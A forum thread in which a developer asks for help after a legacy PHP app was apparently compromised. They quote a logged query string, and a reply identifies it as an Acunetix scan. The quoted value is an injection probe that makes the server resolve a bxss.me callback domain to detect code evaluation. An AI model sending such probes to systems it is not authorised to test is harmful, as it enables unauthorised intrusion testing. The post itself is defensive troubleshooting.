It's been scanned by Acunetix, a pentest tool, and the domain bxss.me is from Acunetix.
SQL injection attacks
Hi Lara peeps
I know this isn't really laravel related but I have a legacy app I am working on which has been hacked I am seeing query strings like this:
?exp_slug=".gethostbyname(lc("hitox"."axwtshsj065b3.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(78).chr(111).chr(65)."&exp_slugs=73rk535&tmcs=6dwkqvu&tmcv=36&tmrl=civ0lus&tmsb=at9zrcl&tmsl=email-capture-popover&tmty=w
I know gethostbyname is a linux function to return ip and host info and can only assume the app in question had undergone some sort of sql injection attack as there are a number of gibberish records added to a couple of the database tables.
I am in the process of moving the whole thing over to a new Laravel app but the powers that be keep sidelining it .
I am not sure where to begin finding the security hole - it was hacked in the same way several months ago and I discovered there was a number of crons sat in the public folder that spoofed the admin session in order to run I moved those to a private off root directory and assumed that was the cause but now I have no clue.
Any help pointing me in the right direction would be greatly appreciated.
Please or to participate in this conversation.